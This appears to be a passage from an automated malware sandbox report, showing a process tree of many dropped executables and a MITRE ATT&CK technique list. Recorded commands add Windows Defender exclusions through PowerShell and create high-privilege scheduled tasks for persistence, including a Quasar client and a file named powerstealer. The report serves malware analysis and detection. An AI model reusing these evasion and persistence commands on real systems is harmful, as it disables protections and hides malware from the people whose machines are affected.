- - C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
    "C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
    3⤵
    PID:5292
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6284
- - C:\Users\Admin\AppData\Local\Temp\a\XW.exe
    "C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
    3⤵
    PID:4388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6732
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7872
- - C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
    3⤵
    PID:6020
- - C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
    "C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
    3⤵
    PID:5980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7152
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6232
- - C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
    "C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
    3⤵
    PID:2348
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 1304
      4⤵
      Program crash
      PID:5664
- - C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
    3⤵
    PID:6240
- - C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
    3⤵
    PID:6540
- - C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
    3⤵
    PID:6996
- - C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
    3⤵
    PID:7268
- - C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
    "C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
    3⤵
    PID:7368
- - C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
    3⤵
    PID:7572
- - C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
    3⤵
    PID:8024
- - C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
    3⤵
    PID:7332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 1200
      4⤵
      Program crash
      PID:5296
- - C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
    3⤵
    PID:1696
  - - C:\Windows\SysWOW64\msiexec.exe
      msiexec /i vcredist.msi
      4⤵
      Event Triggered Execution: Installer Packages
      PID:7840
- - C:\Users\Admin\AppData\Local\Temp\a\jy.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
    3⤵
    PID:5960
  - - C:\Users\Admin\AppData\Local\Temp\is-K48KG.tmp\jy.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-K48KG.tmp\jy.tmp" /SL5="$801FC,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
      4⤵
      PID:8140
- - C:\Users\Admin\AppData\Local\Temp\a\test30.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
    3⤵
    PID:6672
- - C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
    "C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
    3⤵
    PID:6360
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7048
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      PID:6860
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6184
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WUviXiYV9Nab.bat" "
        5⤵
        
        PID:2040
- - C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
    3⤵
    PID:2760
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7524
- - C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
    3⤵
    PID:2100
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7136
- - C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
    3⤵
    PID:5384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8rMGYVCuBZ7G.bat" "
      4⤵
      PID:5132
- - C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
    "C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
    3⤵
    PID:7364
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
      4⤵
      PID:6024
- C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:3700
- - C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
    "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1896
- C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
  "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5280
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\10000520110\123719821238.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3164
- - C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
    "C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5200
- C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
  "C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
  2⤵
  PID:7248
- C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
  "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
  2⤵
  PID:3896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3632

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3832

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4048

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4228

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1752

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3964

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2820

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3584

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3580

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4896

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3464

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:5568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:6040
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1800 -ip 1800
  2⤵
  PID:5152
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1800 -ip 1800
  2⤵
  PID:5580
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7332 -ip 7332
  2⤵
  PID:2596
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2348 -ip 2348
  2⤵
  PID:8056

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7952

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Event Triggered Execution

T1546

Installer Packages

T1546.016

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Event Triggered Execution

T1546

Installer Packages

T1546.016

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion